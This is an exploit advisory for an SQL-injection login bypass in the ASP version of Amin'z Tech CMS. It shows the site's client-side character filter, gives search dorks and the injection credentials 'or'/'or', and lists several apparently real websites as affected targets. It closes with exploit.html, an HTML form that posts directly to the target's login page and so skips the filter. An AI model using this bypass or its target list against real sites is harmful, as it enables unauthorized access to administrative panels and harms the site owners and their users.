Amin'z Tech CMS (asp) - Security bypassed & Auth bypass PoC Exploit

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
                 Turkey Security Group
                 'h4x0re SECURITY'                      
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Amin'z Tech CMS
|~Affected Version : ASP
|~Official Web: http://www.aminztech.com/
|~RISK : High
|~Google Keyword/Dorks :
"Developer by Amin' z Tech"
"Desgined By: Amin'z Tech" inurl:asp
|~Tested On : Kali Linux \ Windows XP
########################################################
####################INFO################################
asp version of the script is effective in.
"panel/login.asp" SQL queries can be sent to.
but there is a small problem....


"/panel/" Source code, security were simple;
character does not accept
----------------------
...
Line 17: var iChars = "!@#$%^&*()+=-[]\\\';,./{}|\":<>?";


  for (var i = 0; i < document.form2.uname.value.length; i++) {
 
  if (iChars.indexOf(document.form2.uname.value.charAt(i)) != -1) {
  alert ("Your Username has special characters. \nThese are not allowed.\n Please remove them and try again.");
  return false;
..
..
-----------------
We will destroy them and be able to easily run SQL queries.
########################################################
####################Usage Exploit########################

Exploitation
Edit to exploit.html target website..
Open exploit.html your browser..
Username : 'or'
Password : 'or'

GO TO ADMIN PANEL..
############################################################
Example affected sites & Tested on:
http://www.pak-line.com/
http://www.5glovesind.com
http://www.expo-star.com
http://www.nifarsports.com
www.conversantint.com
http://sssurgimed-intl.com
http://www.mahboobbros.com/panel/login.asp
... etc

==============================================================================00
Admin Panel Security bypassed & auth bypass PoC ; exploit.html
==============================================================================00

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td>&nbsp;</td>
    <td width="700" align="center"><form name="form2" id="form2" method="post" action="http://[TARGET]/panel/login.asp" onSubmit="return checkform();">
        <table width="400" height="200" border="0" cellpadding="0" cellspacing="0">
          <tr align="center">
            <td height="30" colspan="3"><strong>Login Infromation</strong></td>
          </tr>
          <tr>
            <td width="93">&nbsp;</td>
            <td width="92">User Name:</td>
            <td width="215" height="26"> <input name="uname" type="text" class="textbox" id="uname"></td>
          </tr>
          <tr>
            <td>&nbsp;</td>
            <td>Password:</td>
            <td height="26"> <input name="pass" type="password" class="textbox" id="pass">
            </td>
          </tr>
          <tr>
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td height="30"> <input name="Submit" type="submit" class="btn" value="Login">
            </td>
          </tr>
          <tr align="center" valign="top">
            <td colspan="3" class="error"></td>
          </tr>
        </table>
      </form></td>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>